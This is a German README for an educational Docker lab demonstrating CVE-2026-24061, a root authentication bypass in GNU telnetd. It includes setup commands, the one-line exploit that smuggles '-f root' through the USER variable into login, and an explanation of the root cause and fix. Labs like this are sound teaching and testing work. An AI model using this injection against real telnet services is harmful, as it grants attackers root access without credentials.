
# Bildungs-Docker-Lab zur Demonstration von CVE-2026-24061 Ein pädagogisches Docker-Lab, das CVE-2026-24061 demonstriert – eine Authentifizierungsumgehung in GNU telnetd, die Root-Zugriff über Argument-Injection in der USER-Umgebungsvariable ermöglicht.
Dieses Repository enthält ein einfaches Docker-Labor zur Demonstration der Schwachstelle CVE-2026-24061. Sie ermöglicht die Umgehung der Authentifizierung und Zugriff als root auf GNU telnetd unter Linux.
Der Zweck ist ausschließlich pädagogischer Natur.
docker build -t cve-2026-24061 .
docker run -it -p 2323:23 cve-2026-24061
Führen Sie in einem anderen Terminal Folgendes aus:
USER="-f root" telnet -a localhost 2323
Danach wird der Zugriff direkt als root gewährt, ohne Aufforderung zur Passworteingabe.
Der Fehler tritt aufgrund einer Argumentinjektion beim Aufruf des Dienstprogramms /usr/bin/login auf. Der telnetd konstruiert dynamisch die Befehlszeile, die zum Aufruf von login verwendet wird, und fügt den Wert der Umgebungsvariable USER über den Platzhalter %U ein, ohne jegliche Sanitisierung.
Da das Dienstprogramm login die Option -f akzeptiert, die die Passwortauthentifizierung ignoriert, kann ein Angreifer USER="-f root" setzen und den direkten Login als root erzwingen.
Da der telnetd mit erhöhten Privilegien ausgeführt wird, führt diese Manipulation sofort zu einer Root-Shell ohne gültige Anmeldeinformationen. Die Ausnutzung ist einfach, erfordert keine vorherige Interaktion und kann leicht automatisiert werden, was den CVSS-Score von 9.8 rechtfertigt.
Die Schwachstelle wurde durch die Einführung von Validierung und Sanitisierung der Variable USER behoben, wodurch Werte blockiert werden, die mit einem Bindestrich beginnen, sowie Sonderzeichen, wodurch die Argumentinjektion in login verhindert wird.